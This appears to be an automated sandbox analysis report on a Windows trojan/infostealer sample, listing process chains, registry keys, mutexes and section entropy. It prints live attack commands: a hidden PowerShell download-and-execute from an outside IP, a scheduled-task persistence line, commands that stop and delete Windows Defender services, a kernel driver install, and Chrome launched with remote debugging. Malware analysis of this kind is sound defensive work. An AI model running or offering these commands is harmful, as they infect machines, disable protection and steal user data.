Source: Af3hqfTjFh.exe, 00000000.00000003.872557082.0000000001784000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000002.873366680.0000000001788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.870336624.0000000001774000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867212588.00000000018A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867212588.00000000018A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867233382.00000000018B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867233382.00000000018B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.872281198.00000000018C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: Af3hqfTjFh.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: please18.exe.43.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: please18[1].43.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: Section: ZLIB complexity 0.9983697055785123
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: Section: gvjtyabe ZLIB complexity 0.9947297453703704
Source: rapes.exe.10.dr Static PE information: Section: ZLIB complexity 0.9983697055785123
Source: rapes.exe.10.dr Static PE information: Section: gvjtyabe ZLIB complexity 0.9947297453703704
Source: random[1].exe.21.dr Static PE information: Section: ZLIB complexity 0.9994582935750637
Source: 466f8e521c.exe.21.dr Static PE information: Section: ZLIB complexity 0.9994582935750637
Source: random[1].exe0.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: random[1].exe0.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: d6a397c01b.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: d6a397c01b.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: 7b35p_003[1].exe.21.dr Static PE information: Section: ds2 ZLIB complexity 0.9912089835934373
Source: 7b35p_003.exe.21.dr Static PE information: Section: ds2 ZLIB complexity 0.9912089835934373
Source: EPTwCQd.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003250538020085
Source: EPTwCQd[1].exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003250538020085
Source: EPTwCQd.exe0.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003250538020085
Source: q4jfn3p[1].exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: q4jfn3p.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: random[1].exe1.21.dr Static PE information: Section: ZLIB complexity 0.9998432046247818
Source: 466a80d633.exe.21.dr Static PE information: Section: ZLIB complexity 0.9998432046247818
Source: crypted.54[1].exe.43.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: crypted.exe.43.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: v7942[1].exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003622159090908
Source: v7942.exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003622159090908
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003236607142858
Source: alex1dskfmdsf.exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003236607142858
Source: f4d01cf3f8.exe.43.dr Static PE information: Section: ZLIB complexity 0.9994582935750637
Source: 01ea7855d3.exe.43.dr Static PE information: Section: ZLIB complexity 0.9998432046247818
Source: gron12321[1].exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003337967867232
Source: gron12321.exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003337967867232
Source: please18.exe.43.dr, Cw53Jay.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: please18[1].43.dr, Cw53Jay.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@163/84@0/24
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E537B5 GetLastError,FormatMessageW, 0_2_00E537B5
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E410BF AdjustTokenPrivileges,CloseHandle, 0_2_00E410BF
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00E416C3
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00E551CD
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E6A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00E6A67C
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00E5648E
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00DE42A2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\EPTwCQd[1].exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe File created: C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta Jump to behavior
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: Af3hqfTjFh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 0000002D.00000002.1848052585.00005B0401B89000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777724775.00005B0400F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777757098.00005B0400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842834875.00005B0401534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 0000002D.00000002.1848052585.00005B0401B89000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777724775.00005B0400F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777757098.00005B0400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842834875.00005B0401534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
Source: chrome.exe, 0000002D.00000002.1847286595.00005B04019F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: v3w47qi58.27.dr, cjwbaas0h.27.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';tic.com
Source: chrome.exe, 0000002D.00000002.1847835777.00005B0401B3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
Source: Af3hqfTjFh.exe Virustotal: Detection: 49%
Source: Af3hqfTjFh.exe ReversingLabs: Detection: 52%
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add /y
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe String found in binary or memory: " /add
Source: rapes.exe String found in binary or memory: " /add /y
Source: unknown Process created: C:\Users\user\Desktop\Af3hqfTjFh.exe "C:\Users\user\Desktop\Af3hqfTjFh.exe"
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe "C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe"
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe "C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe"
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe "C:\Users\user\AppData\Local\Temp\10351780101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\504C.tmp\504D.tmp\504E.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe "C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe"
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2284,i,14052270885634350460,10056788384925105811,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2484 /prefetch:3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe "C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe "C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe "C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe "C:\Users\user\AppData\Local\Temp\10351780101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe "C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe "C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: unknown unknown
